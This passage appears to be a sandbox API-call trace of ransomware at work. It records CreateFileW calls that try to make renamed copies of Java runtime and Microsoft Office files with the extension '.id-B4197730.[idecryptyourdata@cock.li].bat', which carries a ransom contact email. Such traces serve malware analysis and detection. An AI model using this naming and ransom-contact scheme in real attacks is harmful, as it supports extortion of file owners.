Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.915] CloseHandle (hObject=0x484) returned 1 [0158.916] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.916] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.916] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.917] CloseHandle (hObject=0x484) returned 1 [0158.920] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.920] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.920] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.920] CloseHandle (hObject=0x484) returned 1 [0158.922] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.922] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0158.922] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javafx.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javafx.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.922] CloseHandle (hObject=0x484) returned 1 [0159.116] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.116] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.117] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.117] CloseHandle (hObject=0x488) returned 1 [0159.118] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.118] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.118] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.118] CloseHandle (hObject=0x488) returned 1 [0159.118] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.119] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.119] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.security.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.security.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.119] CloseHandle (hObject=0x488) returned 1 [0159.119] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.119] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.119] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.119] CloseHandle (hObject=0x488) returned 1 [0159.120] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.120] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.120] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\local_policy.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\local_policy.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.120] CloseHandle (hObject=0x488) returned 1 [0159.122] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.122] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.122] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.122] CloseHandle (hObject=0x488) returned 1 [0159.122] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.123] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.123] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.123] CloseHandle (hObject=0x488) returned 1 [0159.124] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.124] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.124] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzmappings.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzmappings.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.125] CloseHandle (hObject=0x488) returned 1 [0159.126] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.126] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.126] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.126] CloseHandle (hObject=0x488) returned 1 [0159.127] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.127] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.127] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.127] CloseHandle (hObject=0x488) returned 1 [0159.151] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456b7b0, Size=0x2000) returned 0x456b7b0 [0159.151] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0160.563] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.563] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.563] CloseHandle (hObject=0x484) returned 1 [0160.567] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.567] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.567] CloseHandle (hObject=0x484) returned 1 [0160.568] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.568] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.569] CloseHandle (hObject=0x484) returned 1 [0160.570] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.571] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.571] CloseHandle (hObject=0x484) returned 1 [0160.572] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.572] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.574] CloseHandle (hObject=0x484) returned 1 [0160.575] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.575] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.575] CloseHandle (hObject=0x484) returned 1 [0160.576] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.576] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.577] CloseHandle (hObject=0x484) returned 1 [0160.577] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.577] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.578] CloseHandle (hObject=0x484) returned 1 [0160.578] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.578] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.578] CloseHandle (hObject=0x484) returned 1 [0160.580] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.580] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.580] CloseHandle (hObject=0x484) returned 1 [0160.581] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.581] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.582] CloseHandle (hObject=0x484) returned 1 [0160.582] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.582] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_07.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_07.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.583] CloseHandle (hObject=0x484) returned 1 [0160.584] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.584] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_08.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_08.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.584] CloseHandle (hObject=0x484) returned 1 [0160.585] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.585] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.585] CloseHandle (hObject=0x484) returned 1 [0160.586] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.587] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.587] CloseHandle (hObject=0x484) returned 1 [0160.589] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.589] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\road_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.589] CloseHandle (hObject=0x484) returned 1 [0160.590] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.590] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.590] CloseHandle (hObject=0x484) returned 1 [0160.591] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.591] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.591] CloseHandle (hObject=0x484) returned 1 [0160.592] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.592] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0160.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff 